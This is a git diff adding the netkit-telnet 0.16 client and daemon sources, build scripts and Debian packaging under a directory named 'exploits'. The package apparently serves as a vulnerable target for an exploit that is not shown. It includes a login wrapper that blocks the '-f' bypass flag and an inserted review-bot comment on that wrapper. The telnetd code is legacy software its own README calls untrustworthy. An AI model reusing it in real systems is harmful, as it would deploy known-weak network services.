+ Integrated a collection of patches that had been lurking on the net,
+ including the 256-ptys support for telnetd and passive mode ftp.
+ Major security fixes, including to fingerd, lpr, rlogin, rsh, talkd,
+ and telnetd. Do *not* use the sliplogin from earlier versions of this
+ package, either.
+ Much of the code builds without libbsd.a or bsd includes.
+ Massive code cleanup. Almost everything compiles clean with gcc
+ -Wall now.
rusers and rusersd do not; patches to rpcgen to fix
+ this would be appreciated if anyone feels like it.
+ Kerberos support has been removed. It didn't work anyway, and
+ proper Kerberos tools come with Kerberos.
+ New maintainer: David A. Holland, dholland@hcs.harvard.edu
+
+date not known
+ NetKit-B-0.06 released.
+
+date not known
+ NetKit-B-0.05 released.
+ Fixed writing entries to /var/adm/wtmp by ftpd, rlogind and
+ telnetd. (logwtmp.c) Florian
+ This is only necessary for the GNU last, not for the one
+ in util-linux...
+
+date not known
+ NetKit-B-0.04 released.
+ Did some nasty changes to telnet/extern.h. I should really take
+ the current version from NetBSD again and make a clean port of
+ it. (signals).
+
+date not known
+ NetKit-B-0.03 released.
+ telnetd: changed the default 'etc/issue.net' to not output the
+ hostname and then the domainname (that should be the fqdn, but
+ is wrong!) Changed also the man page issue.net.5
+ changed telnetd to get the fqdn and not only use what
+ 'gethostname' returns
+ telnetd: changed some code back to original form to properly
+ enable binary mode negotiation (outgoing data wasn't binary)
+ Please test this out: do "telnet some_other_not_linux_host" and
+ then do "vi TEST_FILE" and test some strange characters >127
+ like ° or §.
+ telnetd: added issue.net.5 to "make install"
+
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG
new file mode 100644
index 0000000..2e529ea
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG
@@ -0,0 +1,20 @@
+# Generated by configure (confgen version 2) on Tue Aug 14 21:32:08 CEST 2001
+#
+
+BINDIR=/usr/bin
+SBINDIR=/usr/sbin
+MANDIR=/usr/man
+BINMODE=755
+DAEMONMODE=755
+MANMODE=644
+PREFIX=/usr
+EXECPREFIX=/usr
+INSTALLROOT=
+CC=gcc
+CXX=gcc
+CFLAGS=-O2 -Wall -W -Wpointer-arith -Wbad-function-cast -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Winline
+CXXFLAGS=-O2 -fno-rtti -fno-exceptions -Wall -W -Wpointer-arith -Wbad-function-cast -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Winline
+LDFLAGS=
+LIBS=-lutil -lutil
+LIBTERMCAP=-lncurses
+USE_GLIBC=1
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in
new file mode 100644
index 0000000..cedb9d1
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in
@@ -0,0 +1,30 @@
+# Dirs
+INSTALLROOT
+BINDIR
+MANDIR
+SBINDIR
+
+# Modes
+BINMODE
+DAEMONMODE
+MANMODE
+
+# Compiling
+ALLWARNINGS
+CC
+CXX
+CFLAGS
+CXXFLAGS
+LDFLAGS
+LIBS
+
+# Features
+FN(snprintf)
+FN(logwtmp)
+LIBTERMCAP
+GLIBC
+BSDSIGNAL
+
+# We actually use openpty, but they come from the same place on all systems
+# I know.
+FN(forkpty)
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MRULES b/exploits/7350855-netkit/netkit-telnet-0.16/MRULES
new file mode 100644
index 0000000..6d8015e
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/MRULES
@@ -0,0 +1,8 @@
+# Standard compilation rules (don't use make builtins)
+
+%.o: %.c
+ $(CC) $(CFLAGS) $< -c
+
+%.o: %.cc
+ $(CXX) $(CXXFLAGS) $< -c
+
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/Makefile b/exploits/7350855-netkit/netkit-telnet-0.16/Makefile
new file mode 100644
index 0000000..1942aee
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/Makefile
@@ -0,0 +1,20 @@
+# You can do "make SUB=blah" to make only a few, or edit here, or both
+# You can also run make directly in the subdirs you want.
+
+SUB = telnet telnetd
+
+%.build:
+ (cd $(patsubst %.build, %, $@) && $(MAKE))
+
+%.install:
+ (cd $(patsubst %.install, %, $@) && $(MAKE) install)
+
+%.clean:
+ (cd $(patsubst %.clean, %, $@) && $(MAKE) clean)
+
+all: $(patsubst %, %.build, $(SUB))
+install: $(patsubst %, %.install, $(SUB))
+clean: $(patsubst %, %.clean, $(SUB))
+
+distclean: clean
+ rm -f MCONFIG
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/README b/exploits/7350855-netkit/netkit-telnet-0.16/README
new file mode 100644
index 0000000..c9b4f49
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/README
@@ -0,0 +1,102 @@
+This is netkit-telnet-0.16.
+
+This package updates netkit-telnet-0.14.
+
+If you're reading this off a CD, go right away and check the net
+archives for later versions and security fixes.
+
+Contents:
+ telnet Client for telnet protocol
+ telnetd Daemon for telnet protocol
+
+Note: These programs do not provide encryption or strong
+authentication of network connections. As such, their use for remote
+logins is discouraged. The "ssh" protocol and package can be used
+instead.
+
+Requires:
+ Working compiler, libc, and kernel, and a recent version of
+ ncurses or libtermcap.
+
+Security:
+ This release probably does not contain new security fixes. On
+ the other hand, vast amounts of suspicious pointer manipulation
+ in telnetd were cleaned up, so it is quite likely that this
+ version is less dangerous than previous ones.
+
+ In any event, telnetd is evil legacy code and is not
+ trustworthy - do not run it unless you absolutely need it.
+
+
+ netkit-telnet-0.14 contained a fix for a set of remote (and
+ possibly serious) denial of service attacks possible against
+ older versions of the telnet daemon.
+
+ Do not under any circumstances use telnetd older than
+ NetKit-0.09!
+
+DEC Alpha:
+ The currently available Compaq C compiler does not provide
+ a C++ compiler, so it cannot compile telnet. Compiling
+ telnetd it may produce a few warnings, but they should be
+ harmless.
+
+Installation:
+ Do "./configure --help" and decide what options you want. The
+ defaults should be suitable for most Linux systems. Then run
+ the configure script.
+
+ Do "make" to compile.
+ Then (as root) do "make install".
+
+ Save a backup copy of any mission-critical program in case the
+ new one doesn't work, and so forth. We warned you.
+
+ *** If you have an old kernel, you may need to apply the enclosed
+ pty-hang patch to it. I don't unfortunately know at the moment
+ which kernel versions need the patch, but current 2.0.x and
+ 2.2.x should be ok without it.
+
+ The following test will tell you if you need the patch: telnet
+ to localhost, do "cat >/dev/null", and type 256 characters
+ without any newlines. If you need the patch, telnetd will hang
+ completely at this point. If it refuses to accept more input,
+ but does not hang, you do not need the patch.
+
+Bugs:
+ Please make sure the header files in /usr/include match the
+ libc version installed in /lib and /usr/lib. If you have weird
+ problems this is the most likely culprit.
+
+ Also, before reporting a bug, be sure you're working with the
+ latest version.
+
+ If something doesn't compile for you, fix it and send diffs.
+ If you can't, send the compiler's error output.
+
+ If it compiles but doesn't work, send as complete a bug report as
+ you can. Patches and fixes are welcome, as long as you describe
+ adequately what they're supposed to fix. Please, one patch per
+ distinct fix. Please do NOT send the whole archive back or
+ reindent the source.
+
+ Be sure to send all correspondence in e-mail. Postings to netnews
+ will not be seen due to the enormous volume.
+
+ Please don't report known bugs (see the BUGS file(s)) unless you
+ are including fixes. :-)
+
+ Mail should be sent to: netbug@ftp.uk.linux.org
+
+
+Note: please see http://www.hcs.harvard.edu/~dholland/computers/netkit.html
+if you are curious why it's been so long since the last NetKit release.
+(The short version is that I gave things to some other people, who let
+them kind of slide.)
+
+I do not currently plan to continue maintaining NetKit; I am doing this
+release and perhaps one or two more, and then I intend to give the source
+tree to Red Hat or some similar organization for long-term maintenance.
+
+David A. Holland
+12 December 1999
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/configure b/exploits/7350855-netkit/netkit-telnet-0.16/configure
new file mode 100644
index 0000000..a17f8f5
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/configure
@@ -0,0 +1,571 @@ +#!/bin/sh +# +# This file was generated by confgen version 2. +# Do not edit. +# + +PREFIX='/usr' +#EXECPREFIX='$PREFIX' +INSTALLROOT='' +BINMODE='755' +#DAEMONMODE='$BINMODE' +MANMODE='644' + +while [ x$1 != x ]; do case $1 in + + --help) + cat < __conftest.c + int main() { int class=0; return class; } +EOF + +if [ x"$CC" = x ]; then + echo -n 'Looking for a C compiler... ' + for TRY in egcs gcc g++ CC c++ cc; do + ( + $TRY __conftest.c -o __conftest || exit 1; + ./__conftest || exit 1; + ) >/dev/null 2>&1 || continue; + CC=$TRY + break; + done + if [ x"$CC" = x ]; then + echo 'failed.' + echo 'Cannot find a C compiler. Run configure with --with-c-compiler.' + rm -f __conftest* + exit + fi + echo "$CC" +else + echo -n 'Checking if C compiler works... ' + if ( + $CC __conftest.c -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + else + echo 'no' + echo 'Compiler '"$CC"' does not exist or cannot compile C; try another.' + rm -f __conftest* + exit + fi +fi + +echo -n "Checking if $CC accepts gcc warnings... " +if ( + $CC $WARNINGS __conftest.c -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + CC_WARNINGS=1 +else + echo 'no' +fi + +cat << EOF > __conftest.cc + template class fnord { public: T x; fnord(T y) { x=y; }}; + int main() { fnord a(0); return a.x; } +EOF + +if [ x"$CXX" = x ]; then + echo -n 'Looking for a C++ compiler... ' + for TRY in egcs gcc g++ CC c++ cc; do + ( + $TRY __conftest.cc -o __conftest || exit 1; + ./__conftest || exit 1; + ) >/dev/null 2>&1 || continue; + CXX=$TRY + break; + done + if [ x"$CXX" = x ]; then + echo 'failed.' + echo 'Cannot find a C++ compiler. Run configure with --with-cpp-compiler.' + rm -f __conftest* + exit + fi + echo "$CXX" +else + echo -n 'Checking if C++ compiler works... 
' + if ( + $CXX __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + else + echo 'no' + echo 'Compiler '"$CXX"' does not exist or cannot compile C++; try another.' + rm -f __conftest* + exit + fi +fi + +echo -n "Checking if $CXX accepts gcc warnings... " +if ( + $CXX $WARNINGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + CXX_WARNINGS=1 +else + echo 'no' +fi + +if [ x$DEBUG != x ]; then + echo -n "Checking if $CC accepts -g... " + if ( + $CC -g __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -g" + else + echo 'no' + fi +fi + +echo -n "Checking if $CC accepts -O2... " +if ( + $CC -O2 __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -O2" +else + echo 'no' + echo -n "Checking if $CC accepts -O... " + if ( + $CC -O __conftest.c -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CFLAGS="$CFLAGS -O" + else + echo 'no' + fi +fi + +if [ x"$CC" != x"$CXX" ]; then + if [ x$DEBUG != x ]; then + echo -n "Checking if $CXX accepts -g... " + if ( + $CXX -g __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -g" + else + echo 'no' + fi + + fi + echo -n "Checking if $CXX accepts -O2... " + if ( + $CXX -O2 __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -O2" + else + echo 'no' + echo -n "Checking if $CXX accepts -O... " + if ( + $CXX -O __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -O" + else + echo 'no' + fi + fi +else + CXXFLAGS="$CFLAGS" +fi +echo -n "Checking if $CXX accepts -fno-rtti... " +if ( + $CXX -fno-rtti __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -fno-rtti" +else + echo 'no' +fi + +echo -n "Checking if $CXX accepts -fno-exceptions... 
" +if ( + $CXX -fno-exceptions __conftest.cc -o __conftest + ) >/dev/null 2>&1; then + echo 'yes' + CXXFLAGS="$CXXFLAGS -fno-exceptions" +else + echo 'no' +fi + + +LDFLAGS= +LIBS= + +rm -f __conftest* + +################################################## + +echo -n 'Checking for BSD signal semantics... ' +cat <__conftest.cc +#include +#include +int count=0; +void handle(int foo) { count++; } +int main() { + int pid=getpid(); + signal(SIGINT, handle); + kill(pid,SIGINT); + kill(pid,SIGINT); + kill(pid,SIGINT); + if (count!=3) return 1; + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS -D__USE_BSD_SIGNAL __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-D__USE_BSD_SIGNAL' + CFLAGS="$CFLAGS -D__USE_BSD_SIGNAL" + CXXFLAGS="$CXXFLAGS -D__USE_BSD_SIGNAL" + else + echo 'no' + echo 'This package needs BSD signal semantics to run.' + rm -f __conftest* + exit + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for ncurses... ' +cat <__conftest.cc +#include +#include +#ifndef KEY_DOWN +syntax error. /* not ncurses */ +#endif +int main() { + endwin(); + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -lncurses -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + NCURSES=1 +else + if ( + $CXX $CXXFLAGS -I/usr/include/ncurses __conftest.cc -lncurses -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-I/usr/include/ncurses' + CFLAGS="$CFLAGS -I/usr/include/ncurses" + CXXFLAGS="$CXXFLAGS -I/usr/include/ncurses" + NCURSES=1 + else + echo 'no' + fi +fi + +if [ x$NCURSES != x ]; then + LIBTERMCAP=-lncurses +else + echo -n 'Checking for traditional termcap... 
' +cat <__conftest.cc +#include +#include +int main() { + tgetent(NULL, NULL); return 0; +} + +EOF + if ( + $CXX $CXXFLAGS __conftest.cc -ltermcap -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-ltermcap' + LIBTERMCAP=-ltermcap + else + echo 'not found' + echo 'This package needs termcap to run.' + rm -f __conftest* + exit + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for GNU libc... ' +cat <__conftest.cc +#include +#if defined(__GLIBC__) && (__GLIBC__ >= 2) +int tester; +#endif +int main() { tester=6; return 0; } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' + USE_GLIBC=1 +else + echo 'no' +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for forkpty... ' +cat <__conftest.cc +#include +int main() { forkpty(0, 0, 0, 0); } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lutil -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lutil' + LIBS="$LIBS -lutil" + else + if ( + $CXX $CXXFLAGS __conftest.cc -lbsd -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lbsd' + LIBBSD="-lbsd" + else + echo 'no' + echo 'This package requires forkpty.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for logwtmp... 
' +cat <__conftest.cc +#ifdef __cplusplus +extern "C" +#endif +void logwtmp(const char *, const char *, const char *); +int main() { logwtmp(0, 0, 0); } + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'yes' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lutil -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lutil' + LIBS="$LIBS -lutil" + else + if ( + $CXX $CXXFLAGS __conftest.cc -lbsd -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lbsd' + LIBBSD="-lbsd" + else + echo 'no' + echo 'This package requires logwtmp.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +echo -n 'Checking for snprintf declaration... ' +cat <__conftest.cc +#include +int main() { + void *x = (void *)snprintf; + printf("%lx", (long)x); + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc -o __conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'ok' +else + if ( + $CXX $CXXFLAGS -D_GNU_SOURCE __conftest.cc -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-D_GNU_SOURCE' + CFLAGS="$CFLAGS -D_GNU_SOURCE" + CXXFLAGS="$CXXFLAGS -D_GNU_SOURCE" + else + echo 'manual' + CFLAGS="$CFLAGS -DDECLARE_SNPRINTF" + CXXFLAGS="$CXXFLAGS -DDECLARE_SNPRINTF" + fi +fi +rm -f __conftest* + +echo -n 'Checking for snprintf implementation... 
' +cat <__conftest.cc +#include +#include +#ifdef DECLARE_SNPRINTF +#ifdef __cplusplus +extern "C" +#endif /*__cplusplus*/ +int snprintf(char *, int, const char *, ...); +#endif /*DECLARE_SNPRINTF*/ +int main() { + char buf[32]; + snprintf(buf, 8, "%s", "1234567890"); + if (strlen(buf)!=7) return 1; + return 0; +} + +EOF +if ( + $CXX $CXXFLAGS __conftest.cc $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo 'ok' +else + if ( + $CXX $CXXFLAGS __conftest.cc -lsnprintf $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-lsnprintf' + LIBS="$LIBS -lsnprintf" + else + if ( + $CXX $CXXFLAGS __conftest.cc -ldb $(LIBBSD) -o __conftest || exit 1 + ./__conftest || exit 1 + ) >/dev/null 2>&1; then + echo '-ldb' + LIBS="$LIBS -ldb" + else + echo 'missing' + echo 'This package requires snprintf.' + rm -f __conftest* + exit + fi + fi +fi +rm -f __conftest* + +################################################## + +## libbsd should go last in case it's broken +if [ "x$LIBBSD" != x ]; then + LIBS="$LIBS $LIBBSD" +fi + +echo 'Generating MCONFIG...' +( + echo -n '# Generated by configure (confgen version 2) on ' + date + echo '#' + echo + + echo "BINDIR=$BINDIR" + echo "SBINDIR=$SBINDIR" + echo "MANDIR=$MANDIR" + echo "BINMODE=$BINMODE" + echo "DAEMONMODE=$DAEMONMODE" + echo "MANMODE=$MANMODE" + echo "PREFIX=$PREFIX" + echo "EXECPREFIX=$EXECPREFIX" + echo "INSTALLROOT=$INSTALLROOT" + echo "CC=$CC" + echo "CXX=$CXX" + if [ x$CC_WARNINGS != x ]; then + CFLAGS="$CFLAGS $WARNINGS" + fi + + if [ x$CXX_WARNINGS != x ]; then + CXXFLAGS="$CXXFLAGS $WARNINGS" + fi + + echo "CFLAGS=$CFLAGS" | sed 's/= */=/' + echo "CXXFLAGS=$CXXFLAGS" | sed 's/= */=/' + echo "LDFLAGS=$LDFLAGS" | sed 's/= */=/' + echo "LIBS=$LIBS" | sed 's/= */=/' + + echo "LIBTERMCAP=$LIBTERMCAP" + echo "USE_GLIBC=$USE_GLIBC" +) > MCONFIG + 
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog b/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog
new file mode 100644
index 0000000..a15309b
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog
@@ -0,0 +1,139 @@ +netkit-telnet (0.16-4potato.1) stable; urgency=low + + * Fixed a memory allocation bug. + + -- Herbert Xu Fri, 22 Sep 2000 23:30:18 +1100 + +netkit-telnet (0.16-4) frozen unstable; urgency=low + + * Disabled signal handling that does not work (closes: #62388). Patches + that provide correct signal handling are welcome. + + -- Herbert Xu Mon, 24 Apr 2000 16:58:22 +1000 + +netkit-telnet (0.16-3) frozen unstable; urgency=medium + + * Restored the default to not being 8-bit clean since it breaks SunOS + (closes: #60352, #60386). People who need 8-bit cleanness should use -8. + * Made FHS compliant. + + -- Herbert Xu Wed, 15 Mar 2000 10:39:00 +1100 + +netkit-telnet (0.16-2) frozen unstable; urgency=low + + * Recompiled with libncurses5. + * Changed the permission of /usr/lib/telnetd/login to 4754 (closes: #58786). + * telnet is now 8-bit clean by default since it appeared to be so in slink, + albeit unintentionally (closes: #57685). + + -- Herbert Xu Sun, 12 Mar 2000 21:10:47 +1100 + +netkit-telnet (0.16-1) frozen unstable; urgency=low + + * New upstream release with security fixes. + * Run as root if devpts is not present. + + -- Herbert Xu Thu, 3 Feb 2000 13:42:29 +1100 + +netkit-telnet (0.14-9) unstable; urgency=low + + * Compile login with -g -O2 -Wall. + * Fixed path to default login in in.telnetd(8). + * Fixed usage() output (closes: #51498). + + -- Herbert Xu Tue, 30 Nov 1999 22:43:39 +1100 + +netkit-telnet (0.14-8) unstable; urgency=low + + * Call fatalperror() instead of fatal() when getpty() fails. + * Delete telnetd group before creating telnetd (closes: #46659). + + -- Herbert Xu Tue, 5 Oct 1999 17:52:36 +1000 + +netkit-telnet (0.14-7) unstable; urgency=low + + * Redirect stderr for group existence check to /dev/null. + + -- Herbert Xu Sat, 25 Sep 1999 22:00:31 +1000 + +netkit-telnet (0.14-6) unstable; urgency=low + + * Check for existence of user/group before removing (fixes #45651). 
+ + -- Herbert Xu Tue, 21 Sep 1999 21:07:18 +1000 + +netkit-telnet (0.14-5) unstable; urgency=low + + * Depend on base-files (>= 2.1.8) for group utmp (fixes #44687). + + -- Herbert Xu Sat, 11 Sep 1999 12:53:08 +1000 + +netkit-telnet (0.14-4) unstable; urgency=low + + * Rebuilt with working fakeroot (fixes #44043, #44044). + + -- Herbert Xu Fri, 3 Sep 1999 20:32:28 +1000 + +netkit-telnet (0.14-3) unstable; urgency=medium + + * telnetd is now a member of utmp (fixes #43543). + * Call adduser with --quiet (fixes #43587). + * configure now works with egcs 2.95 (fixes #43580, #43747) + + -- Herbert Xu Thu, 2 Sep 1999 21:18:06 +1000 + +netkit-telnet (0.14-2) unstable; urgency=low + + * telnetd now depends on adduser and passwd (fixes #43515). + + -- Herbert Xu Thu, 26 Aug 1999 14:49:25 +1000 + +netkit-telnet (0.14-1) unstable; urgency=low + + * New upstream release. + * Installed the login wrapper (fixes #42092). + * Reopen logging if necessary (fixes #36149). + + -- Herbert Xu Tue, 24 Aug 1999 09:17:24 +1000 + +netkit-telnet (0.12-6) unstable; urgency=low + + * Applied patch from Matt McLean for openpty support (fixes #35629). + * Use glibc versions of logout/logwtmp. + + -- Herbert Xu Tue, 29 Jun 1999 14:16:14 +1000 + +netkit-telnet (0.12-5) unstable; urgency=low + + * Fixed a bug with hostnames longer than 64 characters (fixes #33559). + + -- Herbert Xu Tue, 16 Mar 1999 15:24:36 +1100 + +netkit-telnet (0.12-4) frozen unstable; urgency=low + + * Uploaded to slink. + + -- Herbert Xu Sun, 15 Nov 1998 15:04:40 +1100 + +netkit-telnet (0.12-3) unstable; urgency=low + + * Rebuilt with libncurses4. + + -- Herbert Xu Sun, 1 Nov 1998 19:38:49 +1100 + +netkit-telnet (0.12-2) unstable; urgency=low + + * Rebuilt with libstdc++2.9 (fixes #27789). + + -- Herbert Xu Thu, 15 Oct 1998 22:32:04 +1000 + +netkit-telnet (0.12-1) unstable; urgency=low + + * Initial Release. 
+ + -- Herbert Xu Mon, 28 Sep 1998 16:50:43 +1000 + +Local variables: +mode: debian-changelog +add-log-mailing-address: "herbert@debian.org" +End: diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/control b/exploits/7350855-netkit/netkit-telnet-0.16/debian/control new file mode 100644 index 0000000..fe25130 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/control @@ -0,0 +1,21 @@ +Source: netkit-telnet +Section: net +Priority: standard +Maintainer: Herbert Xu +Standards-Version: 3.0.1 + +Package: telnet +Architecture: any +Depends: ${shlibs:Depends} +Replaces: netstd +Description: The telnet client. + The telnet command is used for interactive communication with another host + using the TELNET protocol. + +Package: telnetd +Architecture: any +Depends: netbase, adduser, base-files (>= 2.1.8), ${shlibs:Depends} +Replaces: netstd +Description: The telnet server. + The in.telnetd program is a server which supports the DARPA telnet interactive + communication protocol. diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright b/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright new file mode 100644 index 0000000..94881eb --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright @@ -0,0 +1,18 @@ +This package was split from netstd by Herbert Xu herbert@debian.org on +Mon, 28 Sep 1998 16:50:43 +1000. + +netstd was created by Peter Tobias tobias@et-inf.fho-emden.de on +Wed, 20 Jul 1994 17:23:21 +0200. + +It was downloaded from ftp://ftp.uk.linux.org/pub/linux/Networking/telnet+ftp/. + +Copyright: + +Copyright (c) 1988, 1993 The Regents of the University of California. +Copyright (c) 1995 David A. Holland +Copyright (c) 1994 Peter Tobias (issue.net(5)) +Copyright (c) 1983, 1995 Eric P. Allman (setproctitle.[ch]) + +The license can be found at /usr/doc/copyright/BSD. + +$Id: copyright,v 1.2 2000/03/08 01:14:59 herbert Exp $ 
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs
new file mode 100644
index 0000000..98d1583
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs
@@ -0,0 +1,2 @@
+usr/bin
+usr/share/man/man1
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs
new file mode 100644
index 0000000..9632452
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/docs
@@ -0,0 +1,2 @@
+BUGS
+README
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c b/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c
new file mode 100644
index 0000000..653129e
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c
@@ -0,0 +1,23 @@
+#include
+#include
+#include
+
+#ifndef _PATH_LOGIN
+#define _PATH_LOGIN "/bin/login"
+#endif
+
+int main(int argc, char **argv)
+{
+ while(argc--) {
+ if((argv[argc][0] == '-')
+ && (argv[argc][1] == 'f')) {
+ openlog("login.telnetd", LOG_PID, LOG_AUTHPRIV);
+ syslog(LOG_CRIT, "login.telnetd tried to use \"-f\"");
+ closelog();
+ return 1;
+ }
+ }
+ setuid(geteuid());
+ argv[0] = _PATH_LOGIN;
+ return execv(argv[0], argv);
+}
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules b/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules
new file mode 100644
index 0000000..ef60a05
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/rules
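Review bot: `setuid(geteuid());` in debian/login.c discards its return value, so if the call fails the wrapper still execs `/bin/login` with the real uid left as the calling account; make the failure fatal with `if (setuid(geteuid()) != 0) return 1;`. The `-f` guard inspects only the first two characters of each argument, so its coverage depends on how login's option parser groups flags; a tighter and easier-to-audit check is to accept exactly the argument forms in.telnetd is known to pass and reject anything else. The refusal is logged to LOG_AUTHPRIV, which is good, but a comment above the loop stating why `-f` must never reach login (it bypasses password authentication for the named user) would make the wrapper's purpose clear to the next maintainer.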
@@ -0,0 +1,77 @@
+#!/usr/bin/make -f
+# $Id: rules,v 1.6 2000/03/14 23:43:29 herbert Exp $
+# Sample debian/rules that uses debhelper. GNU copyright 1997 by Joey Hess.
+
+# Uncomment this to turn on verbose mode.
+#export DH_VERBOSE=1
+
+CFLAGS=-g -O2 -Wall
+
+build: build-stamp
+build-stamp: debian/login
+ dh_testdir
+
+ if [ ! -f MCONFIG ]; then ./configure --debug; fi
+ $(MAKE)
+
+ touch build-stamp
+
+clean:
+ dh_testdir
+ dh_testroot
+ rm -f build-stamp install-stamp
+
+ -$(MAKE) distclean
+ rm -f debian/login debian/login.o
+
+ dh_clean
+
+install: install-stamp
+install-stamp: build-stamp
+ dh_testdir
+ dh_testroot
+ dh_clean -k
+ dh_installdirs
+
+ $(MAKE) -C telnet INSTALLROOT=`pwd`/debian/tmp MANDIR=/usr/share/man \
+ install
+ $(MAKE) -C telnetd INSTALLROOT=`pwd`/debian/telnetd \
+ MANDIR=/usr/share/man install
+ cp debian/login debian/telnetd/usr/lib/telnetd
+
+ touch install-stamp
+
+# Build architecture-independent files here.
+binary-indep: build install
+# We have nothing to do by default.
+
+# Build architecture-dependent files here.
+binary-arch: build install
+# dh_testversion
+ dh_testdir
+ dh_testroot
+ dh_installdocs
+ dh_installexamples
+ dh_installmenu
+# dh_installemacsen
+# dh_installinit
+ dh_installcron
+# dh_installmanpages
+# dh_undocumented
+ dh_installchangelogs ChangeLog
+ dh_strip
+ dh_compress
+ dh_fixperms
+ dh_suidregister
+ dh_installdeb
+ dh_shlibdeps
+ dh_gencontrol
+# dh_makeshlibs
+ dh_md5sums
+ dh_builddeb
+
+source diff:
+ @echo >&2 'source and diff are obsolete - use dpkg-source -b'; false
+
+binary: binary-indep binary-arch
+.PHONY: build clean binary-indep binary-arch binary
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs
new file mode 100644
index 0000000..8759ade
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs
@@ -0,0 +1,4 @@
+usr/lib/telnetd
+usr/share/man/man5
+usr/share/man/man8
+usr/sbin
